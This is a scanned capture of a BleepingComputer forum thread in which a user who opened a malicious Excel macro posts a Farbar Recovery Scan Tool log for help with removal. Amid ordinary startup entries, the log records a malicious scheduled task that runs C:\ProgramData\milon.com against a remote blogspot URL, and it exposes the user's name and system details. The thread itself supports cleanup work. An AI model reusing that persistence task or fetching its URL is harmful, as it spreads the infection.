www.bleepingcomputer.com
Open in
urlscan Pro
104.20.60.209
Public Scan
Submitted URL: https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/#entry5336527
Effective URL: https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/
Submission: On April 01 via api from US — Scanned from DE
Effective URL: https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/
Submission: On April 01 via api from US — Scanned from DE
Form analysis
3 forms found in the DOMPOST https://www.bleepingcomputer.com/forums/index.php?app=core&module=search&do=search&fromMainBar=1
<form action="https://www.bleepingcomputer.com/forums/index.php?app=core&module=search&do=search&fromMainBar=1" method="post" id="search-box">
<fieldset>
<label for="main_search" class="hide">Search</label>
<a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=search&search_in=forums" title="Advanced Search" accesskey="4" rel="search" id="adv_search" class="right">Advanced</a>
<span id="search_wrap" class="right">
<input type="text" id="main_search" name="search_term" class="" size="17" tabindex="100" placeholder="Search...">
<span class="choice ipbmenu clickable" id="search_options" style="">This topic</span>
<ul id="search_options_menucontent" class="ipbmenu_content ipsPad" style="display: none; position: absolute; z-index: 9999;">
<li class="title" style="z-index: 10000;"><strong style="z-index: 10000;">Search section:</strong></li>
<li class="special" style="z-index: 10000;">
<label for="s_topic" title="This topic" style="z-index: 10000;">
<input type="radio" name="search_app" value="forums:topic:770127" class="input_radio" id="s_topic" checked="checked" style="z-index: 10000;"><strong style="z-index: 10000;">This topic</strong>
</label>
</li>
<li class="app" style="z-index: 10000;"><label for="s_forums" title="Forums" style="z-index: 10000;"><input type="radio" name="search_app" class="input_radio" id="s_forums" value="forums" style="z-index: 10000;">Forums</label></li>
<li class="app" style="z-index: 10000;"><label for="s_members" title="Members" style="z-index: 10000;"><input type="radio" name="search_app" class="input_radio" id="s_members" value="members" style="z-index: 10000;">Members</label></li>
<li class="app" style="z-index: 10000;"><label for="s_core" title="Help Files" style="z-index: 10000;"><input type="radio" name="search_app" class="input_radio" id="s_core" value="core" style="z-index: 10000;">Help Files</label></li>
<li class="app" style="z-index: 10000;">
<label for="s_calendar" title="Calendar" style="z-index: 10000;">
<input type="radio" name="search_app" class="input_radio" id="s_calendar" value="calendar" style="z-index: 10000;">Calendar </label>
</li>
</ul>
<input aria-label="Search the forum" type="submit" class="submit_input clickable" value="">
</span>
</fieldset>
</form>
POST https://www.bleepingcomputer.com/forums/index.php?
<form id="modform" method="post" action="https://www.bleepingcomputer.com/forums/index.php?">
<input type="hidden" name="app" value="forums">
<input type="hidden" name="module" value="moderate">
<input type="hidden" name="section" value="moderate">
<input type="hidden" name="do" value="postchoice">
<input type="hidden" name="f" value="22">
<input type="hidden" name="t" value="770127">
<input type="hidden" name="auth_key" value="880ea6a14ea49e853634fbdc5015a024">
<input type="hidden" name="st" value="">
<input type="hidden" name="page" value="">
<input type="hidden" value="" name="selectedpidsJS" id="selectedpidsJS">
<input type="hidden" name="tact" id="tact" value="">
</form>
POST https://www.bleepingcomputer.com/forums/index.php?app=core&module=global§ion=login&do=process
<form action="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&do=process" method="post" id="login">
<input type="hidden" name="auth_key" value="880ea6a14ea49e853634fbdc5015a024">
<input type="hidden" name="referer" value="https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/">
<h3>Sign In</h3>
<div class="ipsBox_notice">
<ul class="ipsList_inline">
<li>
<a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&serviceClick=twitter" class="ipsButton_secondary"><img src="https://www.bleepingcomputer.com/forums/public/style_images/master/loginmethods/twitter.png" alt="Twitter"> Use Twitter</a>
</li>
</ul>
</div>
<br>
<div class="ipsForm ipsForm_horizontal">
<fieldset>
<ul>
<li class="ipsField">
<div class="ipsField_content"> Need an account? <a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=register" title="Register now!">Register now!</a>
</div>
</li>
<li class="ipsField ipsField_primary">
<label for="ips_username" class="ipsField_title">Username</label>
<div class="ipsField_content">
<input id="ips_username" type="text" class="input_text" name="ips_username" size="30" tabindex="0">
</div>
</li>
<li class="ipsField ipsField_primary">
<label for="ips_password" class="ipsField_title">Forum Password</label>
<div class="ipsField_content">
<input id="ips_password" type="password" class="input_text" name="ips_password" size="30" tabindex="0"><br>
<a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=lostpass" title="Retrieve password">I've forgotten my password</a>
</div>
</li>
<li class="ipsField ipsField_checkbox">
<input type="checkbox" id="inline_remember" checked="checked" name="rememberMe" value="1" class="input_check" tabindex="0">
<div class="ipsField_content">
<label for="inline_remember">
<strong>Remember me</strong><br>
<span class="desc lighter">This is not recommended for shared computers</span>
</label>
</div>
</li>
<li class="ipsField ipsField_checkbox">
<input type="checkbox" id="inline_invisible" name="anonymous" value="1" class="input_check" tabindex="0">
<div class="ipsField_content">
<label for="inline_invisible">
<strong>Sign in anonymously</strong><br>
<span class="desc lighter">Don't add me to the active users list</span>
</label>
</div>
</li>
<li class="ipsPad_top ipsForm_center desc ipsType_smaller">
<a rel="nofollow" href="https://www.bleepingcomputer.com/forums/privacypolicy/">Privacy Policy</a>
</li>
</ul>
</fieldset>
<div class="ipsForm_submit ipsForm_center">
<input type="submit" class="ipsButton" value="Sign In" tabindex="0">
</div>
</div>
</form>
Text Content
WE VALUE YOUR PRIVACY We and our partners store and/or access information on a device, such as cookies and process personal data, such as unique identifiers and standard information sent by a device for personalised ads and content, ad and content measurement, and audience insights, as well as to develop and improve products. With your permission we and our partners may use precise geolocation data and identification through device scanning. You may click to consent to our and our partners’ processing as described above. Alternatively you may access more detailed information and change your preferences before consenting or to refuse consenting. Please note that some processing of your personal data may not require your consent, but you have a right to object to such processing. Your preferences will apply to this website only. You can change your preferences at any time by returning to this site or visit our privacy policy. MORE OPTIONSAGREE * Sign In * Create Account Search Advanced This topic * Search section: * This topic * Forums * Members * Help Files * Calendar * * View New Content * Forum Rules * BleepingComputer.com * Forums * Members * Tutorials * Startup List * Virus Removal * Downloads * Uninstall List * Welcome Guide * More 1. BleepingComputer.com 2. → Security 3. → Virus, Trojan, Spyware, and Malware Removal Help Javascript Disabled Detected You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality. Register a free account to unlock additional features at BleepingComputer.com Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site. Click here to Register a free account now! or read our Welcome Guide to learn how to use this site. Latest News: Beastmode botnet boosts DDoS power with new router exploits Featured Deal: Take a bet on what you'll get in this $60 tech mystery box deal DEFENDER FINDING SAME ISSUE OVER AND OVER Started by ktait80 , Mar 23 2022 08:37 AM * Page 1 of 4 * 1 * 2 * 3 * Next * » * Please log in to reply 51 replies to this topic #1 KTAIT80 ktait80 * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 23 March 2022 - 08:37 AM Good Morning: I goofed and opened a excel that was NOT from a client. It had a macro attached so I'm pretty sure I'm infected. Windows defender keeps finding the same problem and quarantining it over and over. I ran the FRST64 and have attached the txt files. At this point, I'm using my backup laptop to minimize any impact I may be getting. Thank you in advance. Karin FRST.txt 70.13KB 4 downloads Addition.txt 120.15KB 4 downloads Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-03-2022 Ran by Karin Hostetler (administrator) on DESKTOP-ID6UD18 (LENOVO 90BG003JUS) (23-03-2022 08:53:32) Running from C:\Users\Karin Hostetler\Desktop\Delete Loaded Profiles: Karin Hostetler & QBDataServiceUser30 & QBDataServiceUser31 & QBDataServiceUser32 Platform: Microsoft Windows 10 Home Version 21H2 19044.1586 (X64) Language: English (United States) Default browser: Chrome Boot Mode: Normal ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe (C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.QBWCMonitor.exe ->) (Intuit, Inc. -> ) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.Application.exe (C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe ->) (EXPRSVPN LLC -> ExpressVPN) C:\Program Files (x86)\ExpressVPN\expressvpnd\expressvpnd.exe (C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_comm_customer.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_system_customer.exe (C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_comm_customer.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_user_customer.exe (C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_service.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_comm_customer.exe (C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_user_expert.exe (C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe (C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe (C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE ->) (The CefSharp Authors) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\CefSharp.BrowserSubprocess.exe <2> (C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe ->) (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe (C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe ->) (AMD) [File not signed] C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe (C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe ->) (AMD) [File not signed] C:\Program Files\AMD\Performance Profile Client\AUEPUF.exe (C:\Program Files\Logitech\SetPointP\SetPoint.exe ->) (Logitech -> Logitech, Inc.) C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.exe (C:\Program Files\Logitech\SetPointP\SetPoint.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\LogiAppBroker.exe (C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCopyAccelerator.exe (C:\Windows\jmesoft\Service.exe ->) () [File not signed] C:\Windows\jmesoft\JME_LOAD.exe (Carbonite, Inc. -> Carbonite, Inc.) C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteUI.exe (CyberLink -> CyberLink) C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe (DriverStore\FileRepository͠470.inf_amd64_35c64671e7fac064\B360357\atiesrxx.exe ->) (Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository͠470.inf_amd64_35c64671e7fac064\B360357\atieclxx.exe (DYMO) [File not signed] C:\Program Files (x86)\DYMO\DYMO Label Software\DYMO.DLS.Printing.Host.exe (explorer.exe ->) (Acresso Software Inc. -> Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe (explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <30> (explorer.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe (explorer.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe (explorer.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe (Intuit, Inc. -> Intuit Inc.) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE (Lenovo (Beijing) Limited -> Lenovo Group Limited) C:\Users\Karin Hostetler\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSB.exe (Lenovo) [File not signed] C:\Windows\jmesoft\hotkey.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\taskkill.exe <3> (Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe (Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe (Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\Power PDF 21\NPDFLM.exe (services.exe ->) () [File not signed] C:\Windows\jmesoft\Service.exe (services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe (services.exe ->) (Adobe Systems Incorporated -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe (services.exe ->) (Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository͠470.inf_amd64_35c64671e7fac064\B360357\atiesrxx.exe (services.exe ->) (AMD) [File not signed] C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe (services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (services.exe ->) (Brother Industries, Ltd.) [File not signed] C:\Program Files (x86)\Browny02\BrYNSvc.exe (services.exe ->) (Carbonite, Inc. -> Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe (services.exe ->) (EXPRSVPN LLC -> ExpressVPN) C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe (services.exe ->) (Hewlett-Packard Company -> HP) C:\Windows\System32\HPSIsvc.exe (services.exe ->) (Intuit Inc.) [File not signed] C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe (services.exe ->) (Intuit, Inc. -> ) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.QBWCMonitor.exe (services.exe ->) (Intuit, Inc. -> Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe (services.exe ->) (Intuit, Inc. -> Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (services.exe ->) (Intuit, Inc. -> SAP SE or an SAP affiliate company) C:\Program Files (x86)\Intuit\QuickBooks 2020\QBDBMgrN.exe (services.exe ->) (Intuit, Inc. -> SAP SE or an SAP affiliate company) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBDBMgrN.exe (services.exe ->) (Intuit, Inc. -> SAP SE or an SAP affiliate company) C:\Program Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe (services.exe ->) (Lenovo -> Lenovo Group Ltd.) C:\Program Files (x86)\Lenovo\VantageService\LenovoVantageService.exe (services.exe ->) (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (services.exe ->) (LENOVO -> Lenovo) C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe (services.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_service.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\NisSrv.exe (services.exe ->) (Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe (services.exe ->) (Realtek Semiconductor Corp -> Realtek Semiconductor Corp.) C:\Program Files (x86)\Realtek\Realtek Bluetooth Filter ONLY\BTDevMgr.exe (services.exe ->) (Sanford, L.P. -> Sanford, L.P.) C:\Program Files (x86)\DYMO\DYMO Label Software\DymoPnpService.exe (svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\AcrobatNotificationClient.exe (svchost.exe ->) (CyberLink Corp. -> CyberLink Corp.) C:\Program Files (x86)\Cyberlink\PowerDVD14\PDVD14Serv.exe (svchost.exe ->) (Intuit, Inc. -> Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2202.10603.0_x64__8wekyb3d8bbwe\Cortana.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.2.2.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Calculator.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\ProgramData\milon.com (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (SweetLabs Inc. -> SweetLabs, Inc) C:\Users\Karin Hostetler\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16695816 2016-08-21] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech Inc -> Logitech, Inc.) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3426560 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-12-04] (CyberLink -> CyberLink) HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-06] (CyberLink -> CyberLink Corp.) HKLM-x32\...\Run: [jmekey] => C:\Windows\jmesoft\hotkey.exe [118784 2013-07-24] (Lenovo) [File not signed] HKLM-x32\...\Run: [jmesoft] => C:\Windows\jmesoft\ServiceLoader.exe [28672 2011-08-17] () [File not signed] HKLM-x32\...\Run: [PowerPDF Registry Controller] => C:\Program Files (x86)\Nuance\Power PDF 21\RegistryController.exe [274216 2017-05-16] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [NuanPowerPdf1NPDFLM] => C:\Program Files (x86)\Nuance\Power PDF 21\NPDFLM.exe [3464816 2017-05-16] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [Nuance Power PDF Standard-reminder] => C:\Program Files (x86)\Nuance\Power PDF 21\Ereg\Ereg.exe [3164280 2016-05-06] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc. -> Nuance Communications, Inc.) HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [146584 2017-11-07] (Brother Industries, Ltd. -> Brother Industries, Ltd.) HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3084288 2012-07-31] (Brother Industries, Ltd.) [File not signed] HKLM-x32\...\Run: [HPUsageTrackingLEDM] => "C:\Program Files (x86)\HP\HP UT LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" (No File) HKLM-x32\...\Run: [MobisynapseSyncHelper] => C:\Program Files (x86)\Mobisynapse\MobisynapseSyncHelper.exe (No File) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2410960 2019-03-01] (Adobe Systems Incorporated -> Adobe Inc.) HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [5818592 2022-03-02] (Adobe Inc. -> Adobe Systems Inc.) HKLM-x32\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Carbonite Backup] => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteUI.exe [1283432 2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) HKLM-x32\...\Run: [ExpressVPNNotificationService] => C:\Program Files (x86)\ExpressVPN\expressvpn-ui\ExpressVPNNotificationServiceStarter.exe [370032 2021-03-22] (EXPRSVPN LLC -> ExpressVPN) HKLM-x32\...\Run: [DYMOWebApi] => "C:\Program Files (x86)\DYMO\DYMO Connect\DYMO.WebApi.Win.Host.exe" /auto (No File) HKLM-x32\...\Run: [DLSService] => "C:\Program Files (x86)\DYMO\DYMO Label Software\DLSService.exe" (No File) HKLM-x32\...\Run: [DLSWebSvc] => C:\Program Files (x86)\DYMO\DYMO Label Software\DYMO.DLS.Printing.Host.exe [4869120 2016-09-13] (DYMO) [File not signed] HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe [5411552 2022-03-02] (Adobe Inc. -> Adobe Systems Incorporated) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [GoToAssist Remote Support Expert] => C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe [614856 2021-07-15] (LogMeIn, Inc. -> LogMeIn, Inc.) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\MountPoints2: {16a4cf3f-21cc-11ea-84fd-c83dd4456ee6} - "G:\SISetup.exe" HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\MountPoints2: {dd6bec4e-07fd-11eb-8535-c83dd4456ee6} - "E:\VerizonSWUpgradeAssistantLauncher.exe" HKLM\...\Windows x64\Print Processors\HP1100PrintProc: C:\Windows\System32\spool\prtprocs\x64\HP1100PP.DLL [74240 2012-08-31] (Microsoft Windows Hardware Compatibility Publisher -> ) HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\WINDOWS\system32\AdobePDF.dll [203936 2021-12-24] (Adobe Inc. -> Adobe Systems Inc) HKLM\...\Print\Monitors\Advanced TCP/IP Port Monitor: C:\WINDOWS\system32\mvtcpmon.dll [541184 2009-06-25] (Marvell Semiconductor, Inc.) [File not signed] HKLM\...\Print\Monitors\DYMO LabelWriter Monitor: C:\WINDOWS\system32\LW400MON.DLL [16384 2018-05-11] (Microsoft Windows Hardware Compatibility Publisher -> DYMO Corp.) HKLM\...\Print\Monitors\HP1100LM: C:\WINDOWS\system32\HP1100LM.DLL [288768 2012-08-31] (Microsoft Windows Hardware Compatibility Publisher -> ) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\99.0.4844.82\Installer\chrmstp.exe [2022-03-21] (Google LLC -> Google LLC) HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{296985B0-9E7B-49B0-9C65-7847A6489C4D}] -> C:\Program Files (x86)\ASAP Utilities\Add_ASAP_Utilities_to_the_Excel_menu.exe [2021-04-14] (A Must in Every Office B.V. -> ) HKLM\Software\...\Authentication\Credential Providers: [{D025C57A-763E-4B14-B580-9B5B161F08BB}] -> C:\WINDOWS\system32\g2ax_credential_provider64_1702.dll [2021-05-15] (LogMeIn, Inc. -> LogMeIn, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2017-03-11] ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass (Marvasol Inc) -> LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2021-07-20] ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit, Inc. -> Intuit Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2021-07-20] ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit, Inc. -> Intuit Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Web Connector.lnk [2021-07-20] ShortcutTarget: QuickBooks Web Connector.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBWebConnector\QBWebConnector.exe (Intuit, Inc. -> Intuit) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2021-07-20] ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE (Intuit, Inc. -> Intuit Inc.) HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {02327D63-A754-4FB5-A387-79010CADB77E} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\50dc28da-d8a5-4075-a449-a2c3de303016 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240 2022-01-28] (Lenovo -> Lenovo Group Ltd.) Task: {058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8} - System32\Tasks\asdsdasdjikindasddeyu => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"] Task: {075916D6-E5F7-40C7-8182-1C67EF084131} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [145480 2021-09-09] (Lenovo -> Lenovo Group Ltd.) Task: {196BBB2B-2A02-4B61-957D-CE1F0834B582} - 